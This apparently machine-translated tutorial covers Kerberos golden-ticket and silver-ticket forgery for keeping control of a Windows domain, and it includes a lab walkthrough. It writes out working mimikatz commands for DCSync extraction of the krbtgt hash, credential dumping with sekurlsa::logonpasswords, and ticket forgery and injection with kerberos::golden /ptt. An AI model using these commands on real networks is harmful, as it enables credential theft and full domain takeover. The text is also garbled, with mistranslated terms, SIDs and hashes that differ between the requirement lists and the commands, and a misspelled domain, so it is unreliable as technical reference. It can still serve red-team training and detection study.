Disclaimer: This article describes the technology is for network security professionals and white hat use, any individual or organization must not spread the use of technologies and tools in criminal acts, once discovered directly submitted to the national security agencies to deal with
Permission to maintain
Gold notes
Ms14068 vulnerability principle was forged domain tube tgt, and the vulnerability of the principle of the bill is counterfeit gold krbtgt user's bill, krbtgt user domain is used to manage user control in issuing tickets, with the user's permission, you can fake system any user
- Conditions golden ticket requirements:
-
1. Domain Name hacker.com
2. domain SID value-1-5-21-1854149318-4101476522-1845767379 S
KRBTGT account NTLM password hashes 3. domain or aes-256 value
0028977ae726d766b150520dc63df9b4
4. fake user name administrator
NTLM password hashes extraction of domain user krbtgt
lsadump::dcsync /domain:hacker.com /user:krbtgt
Forgery administrator user
kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt
Silver notes
Silver and gold ms14068 bills with the principles of the bill are not the same, ms14068 and gold notes are counterfeit tgt (tickets issued ticket), while silver bill is counterfeit st (tickets), this benefit is not the ticket after kdc, and thus more hidden, but forged tickets only on the part of service work, such as cifs (file sharing service), mssql, winrm (windows remote management), dns, etc.
- Conditions silver notes requirements
-
1. Domain
hacker.com
2. domain SID
S-1-5-21-1854149318-4101476522-1845767379
3. target server the FQDN
dc.hacker.com
4. available services
CIFS
5. The service account the HASH NTML
52c74fc45feba971209be6f2bc068814
. 6. need fake user name
test
Obtain domain controller machine hash
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt
Silver counterfeit bills
kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt
lab environment:
- Windows Server 2012 R2 x64 (the domain controller machine)
- Windows 7 x64 sp1 (domain user machine)
- pfSense (routing)
ms14068
Please refer to the specific method for building domain-controlled environment within the enterprise to build a network of 30,000 words a detailed deployment tutorial
Simulation:
Gold counterfeit bills
Information gathering
ipconfig /allGet a domain name
whoami /allto get the SID
using mimikatz software to get NTLM password hashes krbtgt user
input klist purgeto delete tickets
Fake ticket
Will replace the collected information to perform a ticket using mimikatz counterfeit software statements administrator user and then exit
successfully got the domain controller
to delete the bill and denied access
Silver counterfeit bills
Information gathering
ipconfig /allGet ip domain controller
input ping -a 10.1.1.1to obtain the full domain name dc.kacker.com
whoami /allto get the SID
export the domain controller machine hash
Fake ticket
The information collected is used to replace the execution sentence mimikatz software counterfeit ticket, you can visit
